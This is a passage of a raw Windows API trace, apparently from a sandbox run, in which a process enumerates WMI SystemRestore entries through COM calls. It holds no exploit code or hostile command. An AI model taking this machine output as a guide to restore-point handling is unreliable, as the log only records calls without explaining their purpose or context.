[5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee478 | out: ppv=0x6ee478*=0x60248d0) returned 0x0 [0122.812] WbemDefPath:IUnknown:QueryInterface (in: This=0x60248d0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee690 | out: ppvObject=0x6ee690*=0x0) returned 0x80004002 [0122.813] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60248d0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee6a4 | out: ppvObject=0x6ee6a4*=0x6025530) returned 0x0 [0122.813] WbemDefPath:IUnknown:Release (This=0x60248d0) returned 0x0 [0122.813] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025530, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee2c4 | out: ppvObject=0x6ee2c4*=0x6025530) returned 0x0 [0122.813] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025530, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee280 | out: ppvObject=0x6ee280*=0x0) returned 0x80004002 [0122.813] WbemDefPath:IUnknown:AddRef (This=0x6025530) returned 0x3 [0122.813] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025530, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edbdc | out: ppvObject=0x6edbdc*=0x0) returned 0x80004002 [0122.813] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025530, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edb8c | out: ppvObject=0x6edb8c*=0x0) returned 0x80004002 [0122.813] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025530, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edb98 | out: ppvObject=0x6edb98*=0xbe1658) returned 0x0 [0122.813] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe1658, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edba0 | out: pCid=0x6edba0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0122.813] WbemDefPath:IUnknown:Release (This=0xbe1658) returned 0x3 [0122.813] CoGetContextToken (in: pToken=0x6edbf8 | out: pToken=0x6edbf8) returned 0x0 [0122.813] CoGetContextToken (in: pToken=0x6ee000 | out: pToken=0x6ee000) returned 0x0 [0122.813] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025530, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee090 | out: ppvObject=0x6ee090*=0x0) returned 0x80004002 [0122.813] WbemDefPath:IUnknown:Release (This=0x6025530) returned 0x2 [0122.813] WbemDefPath:IUnknown:Release (This=0x6025530) returned 0x1 [0122.813] CoGetContextToken (in: pToken=0x6ee988 | out: pToken=0x6ee988) returned 0x0 [0122.813] CoGetContextToken (in: pToken=0x6ee8e8 | out: pToken=0x6ee8e8) returned 0x0 [0122.813] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025530, riid=0x6ee9b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee9b4 | out: ppvObject=0x6ee9b4*=0x6025530) returned 0x0 [0122.814] WbemDefPath:IUnknown:AddRef (This=0x6025530) returned 0x3 [0122.814] WbemDefPath:IUnknown:Release (This=0x6025530) returned 0x2 [0122.814] WbemDefPath:IWbemPath:SetText (This=0x6025530, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=15") returned 0x0 [0122.814] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb38 | out: puCount=0x6eeb38*=0x2) returned 0x0 [0122.814] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb34*=0x11, pszText=0x0) returned 0x0 [0122.814] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb34*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.814] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb04 | out: puCount=0x6eeb04*=0x2) returned 0x0 [0122.814] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb00*=0x11, pszText=0x0) returned 0x0 [0122.814] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb00*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.814] IWbemClassObject:Get (in: This=0x6026ea8, wszName="sequencenumber", lFlags=0, pVal=0x6eeb00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a2bc8*=0, plFlavor=0x38a2bcc*=0 | out: pVal=0x6eeb00*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xf, varVal2=0x0), pType=0x38a2bc8*=19, plFlavor=0x38a2bcc*=0) returned 0x0 [0122.814] IWbemClassObject:Get (in: This=0x6026ea8, wszName="sequencenumber", lFlags=0, pVal=0x6eeb08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a2bc8*=19, plFlavor=0x38a2bcc*=0 | out: pVal=0x6eeb08*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xf, varVal2=0x0), pType=0x38a2bc8*=19, plFlavor=0x38a2bcc*=0) returned 0x0 [0122.814] CoTaskMemAlloc (cb=0x4) returned 0xbe1698 [0122.814] IEnumWbemClassObject:Next (in: This=0x6022d34, lTimeout=-1, uCount=0x1, apObjects=0xbe1698, puReturned=0x389bfe4 | out: apObjects=0xbe1698*=0x6027568, puReturned=0x389bfe4*=0x1) returned 0x0 [0122.815] IUnknown:QueryInterface (in: This=0x6027568, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee170 | out: ppvObject=0x6ee170*=0x6027568) returned 0x0 [0122.815] IUnknown:QueryInterface (in: This=0x6027568, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee12c | out: ppvObject=0x6ee12c*=0x0) returned 0x80004002 [0122.815] IUnknown:QueryInterface (in: This=0x6027568, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6edf4c | out: ppvObject=0x6edf4c*=0x0) returned 0x80004002 [0122.815] IUnknown:AddRef (This=0x6027568) returned 0x3 [0122.815] IUnknown:QueryInterface (in: This=0x6027568, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6eda8c | out: ppvObject=0x6eda8c*=0x0) returned 0x80004002 [0122.815] IUnknown:QueryInterface (in: This=0x6027568, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6eda3c | out: ppvObject=0x6eda3c*=0x0) returned 0x80004002 [0122.815] IUnknown:QueryInterface (in: This=0x6027568, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6eda48 | out: ppvObject=0x6eda48*=0x602756c) returned 0x0 [0122.815] IMarshal:GetUnmarshalClass (in: This=0x602756c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6eda50 | out: pCid=0x6eda50*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0122.815] IUnknown:Release (This=0x602756c) returned 0x3 [0122.815] CoGetContextToken (in: pToken=0x6edaa8 | out: pToken=0x6edaa8) returned 0x0 [0122.815] CoGetContextToken (in: pToken=0x6edeb0 | out: pToken=0x6edeb0) returned 0x0 [0122.815] IUnknown:QueryInterface (in: This=0x6027568, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edf40 | out: ppvObject=0x6edf40*=0x0) returned 0x80004002 [0122.815] IUnknown:Release (This=0x6027568) returned 0x2 [0122.815] CoGetContextToken (in: pToken=0x6ee480 | out: pToken=0x6ee480) returned 0x0 [0122.815] CoGetContextToken (in: pToken=0x6ee3e0 | out: pToken=0x6ee3e0) returned 0x0 [0122.815] IUnknown:QueryInterface (in: This=0x6027568, riid=0x6ee4b0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6ee4ac | out: ppvObject=0x6ee4ac*=0x6027568) returned 0x0 [0122.816] IUnknown:AddRef (This=0x6027568) returned 0x4 [0122.816] IUnknown:Release (This=0x6027568) returned 0x3 [0122.816] IUnknown:Release (This=0x6027568) returned 0x2 [0122.816] CoTaskMemFree (pv=0xbe1698) [0122.816] CoGetContextToken (in: pToken=0x6ee7e8 | out: pToken=0x6ee7e8) returned 0x0 [0122.816] IUnknown:AddRef (This=0x6027568) returned 0x3 [0122.816] IWbemClassObject:Get (in: This=0x6027568, wszName="__GENUS", lFlags=0, pVal=0x6eeafc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb7c*=0, plFlavor=0x6eeb78*=0 | out: pVal=0x6eeafc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x6eeb7c*=3, plFlavor=0x6eeb78*=64) returned 0x0 [0122.816] IWbemClassObject:Get (in: This=0x6027568, wszName="__PATH", lFlags=0, pVal=0x6eeae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb64*=0, plFlavor=0x6eeb60*=0 | out: pVal=0x6eeae0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=17", varVal2=0x0), pType=0x6eeb64*=8, plFlavor=0x6eeb60*=64) returned 0x0 [0122.816] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=17") returned 0x70 [0122.816] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=17") returned 0x70 [0122.816] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eeb0c | out: ppv=0x6eeb0c*=0xb51e34) returned 0x0 [0122.816] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eeb04 | out: pAptType=0x6eeb04*=1) returned 0x0 [0122.816] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eeb08 | out: ppvObject=0x6eeb08*=0x0) returned 0x80004002 [0122.816] IUnknown:Release (This=0xb51e34) returned 0x1 [0122.817] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee478 | out: ppv=0x6ee478*=0x60248e0) returned 0x0 [0122.817] WbemDefPath:IUnknown:QueryInterface (in: This=0x60248e0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee690 | out: ppvObject=0x6ee690*=0x0) returned 0x80004002 [0122.817] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60248e0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee6a4 | out: ppvObject=0x6ee6a4*=0x60255a0) returned 0x0 [0122.817] WbemDefPath:IUnknown:Release (This=0x60248e0) returned 0x0 [0122.817] WbemDefPath:IUnknown:QueryInterface (in: This=0x60255a0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee2c4 | out: ppvObject=0x6ee2c4*=0x60255a0) returned 0x0 [0122.817] WbemDefPath:IUnknown:QueryInterface (in: This=0x60255a0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee280 | out: ppvObject=0x6ee280*=0x0) returned 0x80004002 [0122.817] WbemDefPath:IUnknown:AddRef (This=0x60255a0) returned 0x3 [0122.817] WbemDefPath:IUnknown:QueryInterface (in: This=0x60255a0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edbdc | out: ppvObject=0x6edbdc*=0x0) returned 0x80004002 [0122.817] WbemDefPath:IUnknown:QueryInterface (in: This=0x60255a0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edb8c | out: ppvObject=0x6edb8c*=0x0) returned 0x80004002 [0122.817] WbemDefPath:IUnknown:QueryInterface (in: This=0x60255a0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edb98 | out: ppvObject=0x6edb98*=0xbe1698) returned 0x0 [0122.817] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe1698, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edba0 | out: pCid=0x6edba0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0122.817] WbemDefPath:IUnknown:Release (This=0xbe1698) returned 0x3 [0122.817] CoGetContextToken (in: pToken=0x6edbf8 | out: pToken=0x6edbf8) returned 0x0 [0122.817] CoGetContextToken (in: pToken=0x6ee000 | out: pToken=0x6ee000) returned 0x0 [0122.817] WbemDefPath:IUnknown:QueryInterface (in: This=0x60255a0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee090 | out: ppvObject=0x6ee090*=0x0) returned 0x80004002 [0122.818] WbemDefPath:IUnknown:Release (This=0x60255a0) returned 0x2 [0122.818] WbemDefPath:IUnknown:Release (This=0x60255a0) returned 0x1 [0122.818] CoGetContextToken (in: pToken=0x6ee988 | out: pToken=0x6ee988) returned 0x0 [0122.818] CoGetContextToken (in: pToken=0x6ee8e8 | out: pToken=0x6ee8e8) returned 0x0 [0122.818] WbemDefPath:IUnknown:QueryInterface (in: This=0x60255a0, riid=0x6ee9b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee9b4 | out: ppvObject=0x6ee9b4*=0x60255a0) returned 0x0 [0122.818] WbemDefPath:IUnknown:AddRef (This=0x60255a0) returned 0x3 [0122.818] WbemDefPath:IUnknown:Release (This=0x60255a0) returned 0x2 [0122.818] WbemDefPath:IWbemPath:SetText (This=0x60255a0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=17") returned 0x0 [0122.818] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb38 | out: puCount=0x6eeb38*=0x2) returned 0x0 [0122.818] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb34*=0x11, pszText=0x0) returned 0x0 [0122.818] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb34*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.818] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb04 | out: puCount=0x6eeb04*=0x2) returned 0x0 [0122.818] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb00*=0x11, pszText=0x0) returned 0x0 [0122.818] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb00*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.818] IWbemClassObject:Get (in: This=0x6027568, wszName="sequencenumber", lFlags=0, pVal=0x6eeb00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a3418*=0, plFlavor=0x38a341c*=0 | out: pVal=0x6eeb00*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x11, varVal2=0x0), pType=0x38a3418*=19, plFlavor=0x38a341c*=0) returned 0x0 [0122.818] IWbemClassObject:Get (in: This=0x6027568, wszName="sequencenumber", lFlags=0, pVal=0x6eeb08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a3418*=19, plFlavor=0x38a341c*=0 | out: pVal=0x6eeb08*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x11, varVal2=0x0), pType=0x38a3418*=19, plFlavor=0x38a341c*=0) returned 0x0 [0122.819] CoTaskMemAlloc (cb=0x4) returned 0xbe16d8 [0122.819] IEnumWbemClassObject:Next (in: This=0x6022d34, lTimeout=-1, uCount=0x1, apObjects=0xbe16d8, puReturned=0x389bfe4 | out: apObjects=0xbe16d8*=0x6027850, puReturned=0x389bfe4*=0x1) returned 0x0 [0122.819] IUnknown:QueryInterface (in: This=0x6027850, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee170 | out: ppvObject=0x6ee170*=0x6027850) returned 0x0 [0122.819] IUnknown:QueryInterface (in: This=0x6027850, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee12c | out: ppvObject=0x6ee12c*=0x0) returned 0x80004002 [0122.819] IUnknown:QueryInterface (in: This=0x6027850, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6edf4c | out: ppvObject=0x6edf4c*=0x0) returned 0x80004002 [0122.820] IUnknown:AddRef (This=0x6027850) returned 0x3 [0122.820] IUnknown:QueryInterface (in: This=0x6027850, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6eda8c | out: ppvObject=0x6eda8c*=0x0) returned 0x80004002 [0122.820] IUnknown:QueryInterface (in: This=0x6027850, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6eda3c | out: ppvObject=0x6eda3c*=0x0) returned 0x80004002 [0122.820] IUnknown:QueryInterface (in: This=0x6027850, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6eda48 | out: ppvObject=0x6eda48*=0x6027854) returned 0x0 [0122.820] IMarshal:GetUnmarshalClass (in: This=0x6027854, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6eda50 | out: pCid=0x6eda50*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0122.820] IUnknown:Release (This=0x6027854) returned 0x3 [0122.820] CoGetContextToken (in: pToken=0x6edaa8 | out: pToken=0x6edaa8) returned 0x0 [0122.820] CoGetContextToken (in: pToken=0x6edeb0 | out: pToken=0x6edeb0) returned 0x0 [0122.820] IUnknown:QueryInterface (in: This=0x6027850, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edf40 | out: ppvObject=0x6edf40*=0x0) returned 0x80004002 [0122.820] IUnknown:Release (This=0x6027850) returned 0x2 [0122.820] CoGetContextToken (in: pToken=0x6ee480 | out: pToken=0x6ee480) returned 0x0 [0122.820] CoGetContextToken (in: pToken=0x6ee3e0 | out: pToken=0x6ee3e0) returned 0x0 [0122.820] IUnknown:QueryInterface (in: This=0x6027850, riid=0x6ee4b0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6ee4ac | out: ppvObject=0x6ee4ac*=0x6027850) returned 0x0 [0122.820] IUnknown:AddRef (This=0x6027850) returned 0x4 [0122.820] IUnknown:Release (This=0x6027850) returned 0x3 [0122.820] IUnknown:Release (This=0x6027850) returned 0x2 [0122.820] CoTaskMemFree (pv=0xbe16d8) [0122.820] CoGetContextToken (in: pToken=0x6ee7e8 | out: pToken=0x6ee7e8) returned 0x0 [0122.820] IUnknown:AddRef (This=0x6027850) returned 0x3 [0122.820] IWbemClassObject:Get (in: This=0x6027850, wszName="__GENUS", lFlags=0, pVal=0x6eeafc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb7c*=0, plFlavor=0x6eeb78*=0 | out: pVal=0x6eeafc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x6eeb7c*=3, plFlavor=0x6eeb78*=64) returned 0x0 [0122.820] IWbemClassObject:Get (in: This=0x6027850, wszName="__PATH", lFlags=0, pVal=0x6eeae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb64*=0, plFlavor=0x6eeb60*=0 | out: pVal=0x6eeae0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=18", varVal2=0x0), pType=0x6eeb64*=8, plFlavor=0x6eeb60*=64) returned 0x0 [0122.820] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=18") returned 0x70 [0122.820] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=18") returned 0x70 [0122.841] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eeb0c | out: ppv=0x6eeb0c*=0xb51e34) returned 0x0 [0122.841] 